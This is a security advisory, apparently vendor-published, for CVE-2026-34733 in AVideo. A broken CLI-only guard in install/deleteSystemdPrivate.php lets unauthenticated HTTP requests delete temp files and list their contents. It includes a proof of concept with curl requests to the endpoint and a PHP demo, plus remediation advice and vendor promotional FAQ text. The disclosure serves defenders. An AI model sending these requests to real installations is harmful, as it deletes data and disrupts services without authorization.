Summary
The AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === 'cli' never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server's temp directory while also disclosing the temp directory contents in its response.
Details
The faulty guard is at lines 2-4 of the script:
// install/deleteSystemdPrivate.php:2-4
if (!php_sapi_name() === 'cli') {
die('Command Line only');
}
Due to PHP operator precedence, this expression is parsed as:
if ((!php_sapi_name()) === 'cli') {
Step-by-step evaluation when accessed via HTTP (Apache/nginx with mod_php or php-fpm):
php_sapi_name()returns"apache2handler"(or"fpm-fcgi", etc.) - a non-empty string!php_sapi_name()applies logical NOT to a truthy string, yieldingfalsefalse === 'cli'is a strict comparison between a boolean and a string, which is alwaysfalse- The
ifbody (die()) is never entered
The correct code should be:
if (php_sapi_name() !== 'cli') {
die('Command Line only');
}
After the bypassed guard, the script enumerates and deletes aged files from the system temp directory:
$glob = glob(sys_get_temp_dir() . "/*");
// ...
foreach ($glob as $file) {
if (filemtime($file) < $one_day_ago) {
unlink($file); // Deletes the file
}
}
The script also outputs the total number of items found and details about processed files, leaking information about the temp directory contents.
Confirmed on a live instance: an unauthenticated HTTP GET request returned HTTP 200 with the response body including "Found total of 91 items", confirming the guard bypass and information disclosure.
Proof of Concept
Step 1: Verify the endpoint is accessible without authentication:
curl -v "https://your-avideo-instance.com/install/deleteSystemdPrivate.php"
Expected response (HTTP 200):
Found total of 91 items
Processing /tmp/phpXXXXXX ...
Deleted: /tmp/old_session_file ...
If the guard were working correctly, the response would be:
Command Line only
Step 2: Demonstrate the PHP operator precedence bug locally:
<?php
// Simulates the bug
$sapi = 'apache2handler'; // non-CLI SAPI
// Buggy check (as written in deleteSystemdPrivate.php)
var_dump(!$sapi === 'cli');
// Output: bool(false) - guard never triggers
// Correct check
var_dump($sapi !== 'cli');
// Output: bool(true) - guard would trigger correctly
?>
Step 3: Monitor the effect by checking before and after:
# Check initial state
curl -s "https://your-avideo-instance.com/install/deleteSystemdPrivate.php" | head -1
# Output: "Found total of 91 items"
# Wait and check again - files older than 24 hours will have been deleted
curl -s "https://your-avideo-instance.com/install/deleteSystemdPrivate.php" | head -1
# Output: "Found total of 47 items" (fewer items after deletion)
Impact
An unauthenticated attacker can trigger deletion of files in the server's system temp directory by simply sending an HTTP request to this endpoint. The impact includes:
- File deletion: Any files in the temp directory older than 24 hours are deleted. This can disrupt server operations by removing PHP session files, upload temp files, cache files, or files used by other applications sharing the same temp directory.
- Information disclosure: The script's output reveals the full path of the temp directory and enumerates its contents, including file names and counts. This can expose internal server paths, session file names, and the presence of other applications.
- Denial of service: Repeated requests can be used to continuously purge temp files, interfering with file uploads, session management, and other temp-dependent operations.
The root cause is a common PHP pitfall where the logical NOT operator (!) has higher precedence than strict comparison (===), causing the intended CLI-only guard to be completely ineffective.
- CWE-284: Improper Access Control
- Severity: Medium
CVE-2026-34733 has a CVSS score of 6.5 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Fix the operator precedence bug at install/deleteSystemdPrivate.php:2 by replacing the negation with the !== operator:
// install/deleteSystemdPrivate.php:2
// Before (broken - always evaluates to false):
if (!php_sapi_name() === 'cli') {
// After (correct):
if (php_sapi_name() !== 'cli') {
Found by aisafe.io
Frequently Asked Questions
- What is CVE-2026-34733? CVE-2026-34733 is a medium-severity security vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet.
- How severe is CVE-2026-34733? CVE-2026-34733 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of wwbn/avideo are affected by CVE-2026-34733? wwbn/avideo (composer) versions <= 26.0 is affected.
- Is there a fix for CVE-2026-34733? No fixed version is listed for CVE-2026-34733 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-34733 exploitable, and should I be worried? Whether CVE-2026-34733 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-34733 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.